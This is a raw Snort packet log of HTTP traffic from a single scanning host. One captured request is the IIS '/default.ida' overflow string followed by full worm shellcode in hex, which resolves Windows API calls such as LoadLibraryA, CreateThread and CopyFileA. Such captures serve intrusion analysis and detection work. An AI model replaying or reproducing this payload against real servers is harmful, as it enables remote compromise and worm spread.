-> 137.189.99.51:80 TCP TTL:122 TOS:0x0 ID:32947 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8E61C7A4 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:58.261598 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:32967 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x8D260AEF Ack: 0x16C763B Win: 0x2238 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:27:00.403138 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:3322 -> 137.189.99.51:80 TCP TTL:122 TOS:0x0 ID:33208 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8E61C7A4 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:27:01.829590 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x5EA 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:33325 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x8D25FC05 Ack: 0x16C763B Win: 0x2238 TcpLen: 20 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 X%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078% 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/xml.Co 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33 ntent-length: 33 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79 ........`.... 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00 ....dg.6..dg.&.. E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF .....h......\... 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40 P.U...\...P.U..@ 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00 .....X....U.=... 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6 ....=........... C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00 ...T....u..~0... 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A ........F0...... 00 00 00 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 8B 1C 24 ..._________...$ FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50 .U.f.....8.....P FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50 .......j...P...P 8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84 ..8...P.E..p.... 00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4 .....8....thS.U. FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00 .U..E.i.T...,... 81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7 ..,............. 89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00 .F4.E.Pj..u..... 00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55 ......j.j..U.P.U D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00 .Ou..;...i.T.... 5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A \&....\&.W.U.j.j 16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45 ..U.j..U....F4)E 84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0 .jd.U...<...P.U. 0F B7 85 3C FE FF FF 3D D2 07 00 00 73 CF 0F B7 ...<...=....s... 85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF .>......s.f..p.. FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00 ...f..r....P.d.. 00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8 ...t...j.j.j..U. 83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80 ...t..E.j.Th~f.. FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50 .u..U.Yj...p...P FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33 .u..U........tK3 DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF ..U.=3'..u?..h.. FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7 .......l........ 85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF .`........E...d. FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF ....h...Pj...`.. FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66 .Pj.j..U..j.Th~f 04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00 ...u..U.Y...u1.. 00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00 ...X-....j.h.... 50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00 P.u..U.=....u.j. 6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF j...\...P.u..U.. 75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81 u..U..........w. C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00 ..........xu.... F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06 ..`......d$.dg.. 00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26 ..Xa..dg.6..dg.& 00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50 ..f.;MZu..K<.<.P 45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C E..u..T.x...B..< 03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75 .KERNu..|..EL32u BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47 .3.I.r ...A..<.G 65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03 etPu..|..rocAu.. 4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03 J.I...J$........ 4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00 J.......D$$dg... 00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8 .Xa..Q....]..E.. 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 ....LoadLibraryA 00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43 ..u..U..E......C 72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF reateThread..u.. 55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63 U..E......GetTic 6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC kCount..u..U..E. E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55 .....Sleep..u..U F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74 ..E......GetSyst 65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00 emDefaultLangID. FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65 .u..U..E......Ge 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 tSystemDirectory 41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00 A..u..U..E...... 43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8 CopyFileA..u..U. 89 45 DC E8 10 00 00 00 47 6C 6F 62 61 6C 46 69 .E......GlobalFi 6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45 ndAtomA..u..U..E D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41 64 64 41 ......GlobalAddA 74 6F 6D 41 tomA =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:27:03.510322 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:33455 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x8D260AEF Ack: 0x16C7731 Win: 0x2143 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:27:03.510324 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:33456 IpLen:20 DgmLen:40 DF *****R** Seq: 0x8D260AEF Ack: 0x0 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:27:05.443018 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:3525 -> 137.189.99.120:80 TCP TTL:122 TOS:0x0 ID:33598 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8F168823 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:27:06.619717 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:3322 -> 137.189.99.51:80 TCP TTL:122 TOS:0x0 ID:33729 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8E61C7A4 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:27:08.587065 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:3525 -> 137.189.99.120:80 TCP TTL:122 TOS:0x0 ID:33874 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8F168823 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:27:17.200789 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:3525 -> 137.189.99.120:80 TCP TTL:122 TOS:0x0 ID:34397 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8F168823 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =============================================================================== Snort processed 57 packets. Breakdown by protocol: Action Stats: TCP: 57 (100.000%) ALERTS: 0 UDP: 0 (0.000%) LOGGED: 0 ICMP: 0 (0.000%) PASSED: 0 ARP: 0 (0.000%) IPv6: 0 (0.000%) IPX: 0 (0.000%) OTHER: 0 (0.000%) =============================================================================== Fragmentation Stats: Fragmented IP Packets: 0 (0.000%) Rebuilt IP Packets: 0 Frag elements used: 0 Discarded(incomplete): 0 Discarded(timeout): 0 =============================================================================== TCP Stream Reassembly Stats: TCP Packets Used: 0 (0.000%) Reconstructed Packets: 0 (0.000%) Streams Reconstructed: 0 ===============================================================================